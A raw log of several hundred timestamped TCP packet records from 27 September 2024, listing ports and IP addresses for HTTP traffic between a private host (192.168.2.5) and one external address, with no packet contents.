Sep 27, 2024 04:21:10.109392881 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.109405994 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.109431028 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.109450102 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110322952 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110335112 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110347986 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110388041 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110388041 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110713959 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110763073 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110771894 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110783100 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110822916 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110837936 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110848904 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110847950 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110862970 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.110903025 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.110903025 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.113437891 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.113495111 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.233793020 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233817101 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233830929 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233843088 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233855009 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233855963 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.233865023 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233875990 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233927965 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.233927965 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.233930111 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233941078 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233949900 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233956099 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.233968019 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234011889 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234076023 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234158039 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234168053 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234178066 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234206915 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234236002 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234236002 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234292984 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234303951 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234303951 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234333992 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234338999 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234344959 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234390020 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234390020 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234802008 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234812021 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234821081 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234842062 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234869003 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234874010 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234879971 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234891891 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234901905 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.234921932 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234921932 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.234968901 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235023022 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235033035 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235042095 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235058069 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235069036 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235074043 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235111952 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235127926 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235764027 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235774994 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235785007 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235837936 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235842943 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235842943 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235848904 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235860109 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235868931 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235891104 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235903978 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235903978 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235935926 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.235960960 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235970974 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.235980034 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.236016989 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.242784977 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.242871046 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.242886066 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.242897034 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.243010998 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.357971907 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.357984066 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358001947 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358021975 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358032942 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358045101 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358055115 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358057022 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358069897 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358104944 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358123064 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358194113 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358194113 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358417988 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358428955 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358439922 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358452082 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358513117 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358513117 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358597994 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358624935 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358637094 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358702898 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358762980 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358778954 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358782053 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358793974 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.358844995 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.358907938 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359004974 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359015942 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359028101 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359087944 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359098911 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359112024 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359139919 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359139919 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359230042 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359241962 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359253883 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359266043 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359266996 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359277010 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359291077 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359319925 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359319925 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359410048 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359692097 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359708071 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359719038 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359791040 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359791040 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359813929 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359824896 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359832048 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359843969 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359873056 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359873056 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359873056 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359885931 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359898090 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.359951019 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359962940 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.359962940 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360328913 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360340118 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360352039 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360425949 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360439062 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360447884 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360450983 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360469103 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360482931 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360502958 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360533953 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360547066 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360621929 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360632896 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360642910 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360650063 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360650063 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360655069 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360666990 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360680103 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.360694885 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360694885 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360738993 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.360738993 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.362946033 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.362996101 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363008022 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363019943 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363030910 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363043070 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.363043070 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.363078117 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363090038 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363101006 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363101959 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.363172054 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.363172054 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.363190889 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363202095 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363212109 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363224030 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363236904 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.363318920 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.363365889 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.448978901 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.448997974 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449019909 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449032068 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449043989 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449055910 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449111938 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449124098 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449131966 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449143887 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449157953 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449177980 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449177980 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449244976 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449255943 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449266911 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449271917 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449278116 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449284077 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449290991 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449325085 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449433088 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449445009 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449455976 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449457884 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449467897 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449481010 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449491978 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449498892 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449503899 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449515104 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449544907 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449570894 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.449620008 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.449690104 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482630968 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482646942 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482666969 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482680082 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482692003 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482702971 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482706070 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482706070 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482714891 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482736111 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482800961 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482800961 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482805014 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482844114 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482855082 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482897997 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482908964 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482923985 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.482923985 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482923985 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482976913 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.482976913 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483010054 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483020067 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483031034 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483046055 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483069897 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483074903 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483087063 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483098030 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483098030 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483112097 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483128071 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483139992 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483164072 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483227968 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483244896 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483256102 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483261108 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483272076 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483280897 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483283997 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483297110 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483309031 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483319998 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483333111 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483361006 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483390093 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483403921 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483413935 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483416080 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483436108 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483494043 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483505964 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483516932 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483525991 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483529091 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483540058 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483577967 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483577967 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483617067 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483628988 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483640909 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483649969 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483654022 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483675957 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483720064 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483731985 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483741999 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483752012 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483763933 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483783007 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483783007 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483783007 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483841896 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483850002 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483867884 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483879089 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483891010 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483901978 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.483916044 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.483942986 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484009981 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484015942 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484026909 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484038115 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484050035 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484061003 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484110117 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484110117 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484147072 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484160900 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484170914 CEST	80	49716	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:10.484180927 CEST	49716	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:10.484184027 CEST	80	49716	185.215.113.26	192.168.2.5
